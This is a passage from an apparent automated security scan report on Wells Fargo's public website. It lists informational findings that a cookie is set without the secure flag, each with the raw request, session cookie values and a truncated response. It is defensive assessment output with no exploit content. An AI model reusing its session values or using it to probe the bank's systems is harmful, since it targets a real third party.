Date: Wed, 02 Feb 2011 22:29:39 GMT
Content-length: 10949
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=mFfWNJhTM3LCLw1nwcXCmgZQLT7M2yhK3vfsDDQBTdRL5f6czJbj!1127287699; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2431933194.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Banking Overview</
...[SNIP]...

6.147. https://www.wellsfargo.com/per/more/loans_credit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /per/more/loans_credit

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /per/more/loans_credit HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:40 GMT
Content-length: 10611
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=LlvBNJhJC3mhJb9Rgj7RS9w1WVHnp24RLXcRh0pK5HRNch3Gxxnz!1697366244; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo - Loans an
...[SNIP]...

6.148. https://www.wellsfargo.com/personal_credit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /personal_credit/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_credit/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:47 GMT
Content-length: 7834
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=S850NJhbvFyXKFsqjRkSJvyZ8MVlMvnnZvZ8BtWvJdLCFxx1ZSxH!-887259216; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2566150922.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo - Personal C
...[SNIP]...

6.149. https://www.wellsfargo.com/personal_credit/rate_payments/rate_calc_main  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /personal_credit/rate_payments/rate_calc_main

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_credit/rate_payments/rate_calc_main HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:48 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=TC2fNJhcJvc8bQh2DP2GHJBG108y42PYVj4VDGmL2nJ0bZdjh3Lq!854257767; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo ... Rate & Payment
...[SNIP]...

6.150. https://www.wellsfargo.com/privacy_security/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy_security/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:31 GMT
Content-length: 7654
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=5MdgNJhLPQJrJbQL2dj2np2B79whD7Gkrq9kkphmPHd9S35MYVGj!457746116; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy & Security
...[SNIP]...

6.151. https://www.wellsfargo.com/privacy_security/fraud/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy_security/fraud/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:29 GMT
Content-length: 7546
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=yVv2NJhJb35jxN6JYsp0LJR40jSkyXq8BL1vVYQycy3X5yBqpGnH!-1164025042; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2633259786.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Privacy an
...[SNIP]...

6.152. https://www.wellsfargo.com/privacy_security/fraud/report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/report/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy_security/fraud/report/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:27 GMT
Content-length: 6368
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=vJxpNJhHLn21ThPNMCWcdb7TJvhkn1h6BwPSlv9wX4vqvRzqm8Cv!312685559; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy and Securi
...[SNIP]...

6.153. https://www.wellsfargo.com/privacy_security/fraud/report/fraud  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/report/fraud

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy_security/fraud/report/fraud HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:29 GMT
Content-length: 5794
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=sGGJNJhJvdHFzNC5MkDQXh52s09R1dnm7LNy8v1BGT8qQTbWpMvl!-213655893; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy and Securi
...[SNIP]...

6.154. https://www.wellsfargo.com/privacy_security/online/guarantee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/online/guarantee

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy_security/online/guarantee HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:31 GMT
Content-length: 7173
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=ZWxLNJhLlFLsVdPS3Q2mcXf3Hh6RcqmGMcp1f68BhHGpyYSdLNJr!-180776916; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1811176202.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy and Securi
...[SNIP]...

6.155. https://www.wellsfargo.com/products_services/HE_selector  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/HE_selector

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products_services/HE_selector HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:58 GMT
Location: https://www.wellsfargo.com/customerApp/jsp/products_services/HE_selector.jsp
Set-Cookie: wcmcookiewf=Z24pNJhG811khdlryT1wFK10GQBcQnR52yn1FwnyvQyZpkwyblxT!-1966973819; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2616482570.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/custome
...[SNIP]...

6.156. https://www.wellsfargo.com/products_services/applications_viewall  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/applications_viewall

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products_services/applications_viewall HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=pG7tNJhHLB1vQvYZNyr4dHYbT2y4l2WdqgQNVV7HxGrQqxWLchvv!-1657447489; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo - Apply for an Acc
...[SNIP]...

6.157. https://www.wellsfargo.com/products_services/brokerage_cklist  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/brokerage_cklist

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products_services/brokerage_cklist HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
Location: https://www.wellsfargo.com/product/apply?prodCode=WFOR-WFOR&prodSet=APP2K&language=en
Set-Cookie: wcmcookiewf=yW8lNJhH2y8PV61Vj0z4DvN2vJJwb2SCmNCn6YJG9hGG1PyGcg9H!1975738457; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2197052170.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/product
...[SNIP]...

6.158. https://www.wellsfargo.com/products_services/deposit_cklist  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/deposit_cklist

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products_services/deposit_cklist HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:55 GMT
Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fdeposit_cklist
Set-Cookie: wcmcookiewf=R0LSNJhDJLQdQfLnqzJygyr0Tchx3G1YHp4RQW2wNh1xkR9TB3RL!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/custome
...[SNIP]...

6.159. https://www.wellsfargo.com/products_services/pll_select  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/pll_select

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products_services/pll_select HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:56 GMT
Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fpll_select
Set-Cookie: wcmcookiewf=ngV4NJhGD36GJv77QsGf18L1ZRq9tdksDFVdmDHvNN0R831F9g1h!-1957896322; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2482264842.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/custome
...[SNIP]...

6.160. https://www.wellsfargo.com/rates/rates_viewall  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /rates/rates_viewall

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rates/rates_viewall HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
Content-length: 4031
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=DlmtNJhHwTpCxFhl7FBT67mHHMKLxbDC2y70fqHsr9QSGL2dNp8S!-569549476; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2650037002.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

6.161. https://www.wellsfargo.com/savings_cds/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /savings_cds/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings_cds/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:36 GMT
Content-length: 10180
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=9yssNJhQcHYRQwphr7KvYjH4Szhz7CLfb0yjsLmN4nqrqJT2KflR!-1077237731; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2415155978.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Savings Account - Compar
...[SNIP]...

6.162. https://www.wellsfargo.com/savings_cds/apply  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /savings_cds/apply

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings_cds/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:37 GMT
Content-length: 11173
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=QXvBNJhRBz1LhBrHvvFfBbPQG6rFyxf2hyty12cJL1qHvL1yCGRS!1697366244; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Open a Savings Account or CD</
...[SNIP]...

6.163. https://www.wellsfargo.com/savings_cds/cds  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /savings_cds/cds

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings_cds/cds HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:37 GMT
Content-length: 11464
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=3TjSNJhR0CvRKG9J9LJwhrzLL0G7hxT2GGYTmjjJN1n923x9J3gv!-1672152970; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>CD Account - Find the Best CD
...[SNIP]...

6.164. https://www.wellsfargo.com/search/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /search/search

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/search HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:02 GMT
Content-type: text/html; charset=utf-8
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: wcmcookiesrh=1TB6NJhKK2Z9GypBRB8QHHz19dkkKbNngWBYv9m0hsNTRY1JpPYr!191917939; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

6.165. https://www.wellsfargo.com/sitemap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /sitemap

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitemap HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:01 GMT
Content-length: 11525
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=BTp2NJhLsKNhHMTBQmCnJr9FVstXChTLdy3nnj71Z2LlVfPHnRfH!-1672152970; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Sitemap</title>
   <meta name="
...[SNIP]...

6.166. https://www.wellsfargo.com/student/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /student/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /student/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
